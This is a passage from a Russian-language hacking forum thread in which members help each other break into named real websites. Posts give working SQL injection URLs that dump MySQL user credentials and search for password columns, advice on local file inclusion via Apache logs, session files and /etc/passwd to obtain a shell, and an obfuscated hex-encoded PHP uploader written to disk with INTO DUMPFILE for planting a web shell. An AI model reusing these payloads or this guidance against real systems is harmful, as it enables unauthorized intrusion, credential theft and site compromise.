Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    Извини меня но если человеку слово инклуд ни о чём не говорит то острактное "прочитать" даст большее понимание чем проинклудить которое более непонятно чем само слово инклуд.

    Расширяйте кругозор:
    Читать
    Воспринимать какую-н. письменную речь по ее внешним знакам, буквам и т. п. (произнося вслух или про себя, молча).Ч. буквы. Ч. слова. Ч. по…
     
    #6861 [x59]ReV, 4 May 2009
    Last edited: 4 May 2009
  2. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Если ты не можешь дать полноценный ответ, то лучше промолчи.
    Ответить на вопрос, сказав что при локальном инклуде можно проинклудить пхп файл выполнив в нём код, который зальёт шелл (или сам код шелла) или прочитать файл не содержащий пхп кода (/etc/passwd, .htpasswd и т.д.) и дать линк на статью на тему инклуда не так сложно.

    Ещё, как совет можно сказать, что можно пытаться проинклудить:

    1. Логи апача.
    2. Файл сессии.
    3. Залитый через форум (или какой нидь двиг) картинку с пхп кодом.
     
    #6862 Grey, 4 May 2009
    Last edited: 4 May 2009
  3. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вообщета я по пыху проф а не по уязвимостям, знал бы не спросил! Учусь быстро! Там инклуд точно а значит к примеру с сайта http://site.ru/shell.php подставить к
    http://wow.alania.net/?page=!

    И получится http://wow.alania.net/?page=http://site.ru/shell.php

    Я прав???

    И обьясните плиз почему это не инъекция???

    http://wow.alania.net/?page=guilds&id=-7'
     
    #6863 geforce, 4 May 2009
    Last edited: 4 May 2009
  4. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    geforce
    LFI (Local File Include)
    Можно как выражается грэй инклудить только локальные фаилы (находящиеся на сервере wow.alania.net)

    Попробуй выполнить команду
    http://wow.alania.net/?page=guilds&id=7+and+1=1+--+
    http://wow.alania.net/?page=guilds&id=7+and+1=2+--+
     
  5. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Друг ты помоему обкурился :D :D :D

    Вообщет надо сначало поля вывода подобрать путем order или методом перебора union+select+1,2,3,4,5,......./**/
     
  6. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    geforce

    Подбирай , как подберёш отпишись.
    И прочитай хотябы фак.
    http://forum.antichat.ru/thread19844.html
    OffTop
    Круто статусное сообщение влияет на отношение к людям))
    Хочу -10000 поможете??
    Grey: Эт не оскорбление это у меня в статусе написано...или меня ачат оскарбляет? 0_0
     
    #6866 [x59]ReV, 4 May 2009
    Last edited: 4 May 2009
    1 person likes this.
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    2 geforce

    1. Он уже ответил тебе, что скули в том параметре нет.
    2. У тебя очень низкие познания в синтаксисе sql, прочти статью линк на которую он тебе дал (а ещё заодно статью от Dr.Z3r0).
    3. Очень советую прочитать статью про инклуд.
    Вообщем то инклуд достаточно серьезная уязвимость и повозиться с ним более чем разумно.
    4. Не надо ни кого оскорблять.

    2 Rev

    Фразы "Друг ты помоему обкурился" и "Ламер" - это всё таки оффтоп и оскорбления.
     
    #6867 Grey, 4 May 2009
    Last edited: 4 May 2009
    2 people like this.
  8. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    geforce
    дрЗиро ---- >http://forum.antichat.ru/thread43966.html
    Не ну я так и не понял -10000 у меня в репе случится??
     
  9. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242

    я понял что тут скуль иньекция возможна
    но при подборе колонок (union+select) я почему то их немогу подобрать(дошол до 30 но не увидел ничего)
    в чем дело?
     
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242+and+ascii(substring((select+concat_ws(0x2F,table_name,table_schema,column_name)+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>1--+
     
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Там рядом с выводом скуля:
    http://www.witchvox.com/va/dt_va.html?a=usfl&c=notes&id=10154)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user,password,host,file_priv),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112+from+mysql.user--+

    --------------------------------------------------


    К топу ниже:

    http://www.placementindia.com/job-search/view_res.php?code=546588&res_ty=ml'+union+select+1,concat_ws(0x3a,'%3Ch1%3E',user(),version(),database(),'%3C/h1%3E')+--+
     
    #6871 AkyHa_MaTaTa, 4 May 2009
    Last edited: 4 May 2009
    1 person likes this.
  12. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
    Кто рассковыряет, тому будет всякое счастье :) Я не смог.
     
  13. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Не у себя попробывал файл check.php создался в нём текст <? include("http://127.0.0.1/shell.txt") ?>
    захожу на сайт шелл выплёвывает это
    Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Program Files\VertrigoServ\www\check.php on line 1

    Warning: include(http://127.0.0.1/shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Program Files\VertrigoServ\www\check.php on line 1

    Warning: include() [function.include]: Failed opening 'http://127.0.0.1/shell.txt' for inclusion (include_path='.;C:\Program Files\VertrigoServ\Smarty') in C:\Program Files\VertrigoServ\www\check.php on line 1
     
    1 person likes this.
  14. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    загрузи какой нибудь мини аплоудер, например(пробелы поуберай):

    PHP:
    select 
    0x3c3f706870206576616c28677a696e666c617465286261736536345f6465636f646528276a5a505062707441454d62766c76774f6f35556c45696b4f6971746547724261705553706c4e535737665a6957516a44576944787237445974616f2b583376724a512b416b6c433769634532394e4244716e515854427858506654437a734c332f575a326471693543744642684a72636c5472767055366665393036655863687665334a6e5661727877324f7135556130386a456b5833564d3179796f32366674576c38666c6f4941396430416731375643494977706e556b616f565153655732575172566a5332586b69395636415434746278683841596979654f5462424e36723270693045744e6949692b4350686d6655595646337866457a665451786263795a2b2f616a782f41677846444749695a76774a6278655a62506245483647502b36534b3468445745657271326746416c3949714a597638773864625a72583032674b77795a634a71744643446433447a41724d504d53492f44444a7255316d486a6b6542596f4b6a45635730522f4e51534268596e7561434a79485a2f75734b3053656859525759464a44466678434d2f73645530684369763757356265773232654a647657477445736875304742416f7a617741435737466f624f4f4a7a4849694743746d674e6b4e7343327433364f38723475484842622b50347846577867713775335131563230596536345234614a537a654c632f652f68483477744179794159766f6d584c74546d667a394434645073727a5675524265512f385a6b4459754a5244704767736a77677661334b3731653331756249443341414f41664749506e652b735a4c79475452477347633559797758474b7a4a6a4c5248786164767a7156756e79735077413336484c48636a664d416e75546433363957506c5572574e5564514a6530733543746c3947764f436c47354873557877655178484354724e4e7347635777544f42336d697779574762702f41557237676b4e614657664b6333304d5779356a2f384b2b77702f41413d3d272929293b203f3e
    INTO DUMPFILE 
    'C:/Program Files/VertrigoServ/www/engine/inc/uplouder.php'
    ну а уже с помошью него загрузи шелл.
     
    1 person likes this.
  15. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Там и не раскрутишь, тк инъекция в limit'е. Ищи другие инъекции, к примеру вот:
    http://www.placementindia.com/job-recruiters/vac_hdetl.php?slno=238629'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
    Вывод присутствует.
     
    1 person likes this.
  16. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Кто сможет подсказать.
    При помощи information_schema.schemata узнал имена используемых баз, а как узнать имена таблиц в конкретной базе?
    Ведь как я понимаю по information_schema.tables выводятся имена таблиц во всех базах, а не в какой-то конкретной? Так ли, или я чего-то путаю?
     
  17. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    select table_name from information_schema.tables where table_schema='blabla';
     
    3 people like this.
  18. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    приятного времени суток....

    Возник вопрос.
    Смотрел статью : https://forum.antichat.ru/showpost.php?p=1047515&postcount=79
    и не хрена не понял ))))

    сайт : http://www.intes-online.de/cms/index.php?id=1


    Order/group by 1


    подскажите , это уже не в 1 раз

    Ps: спс за время
     
    1 person likes this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.intes-online.de/cms/index.php?id=1+and+substring(version(),1,1)=5
    
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Saiga
    Там дальше комментарии.
    Писал я это для того, что-бы показать , что вывод ВОЗМОЖЕН, но не везде разумеется.
    Тоесть никто не говорил, что при двойных запросах 100% будет вывод
     
Thread Status:
Not open for further replies.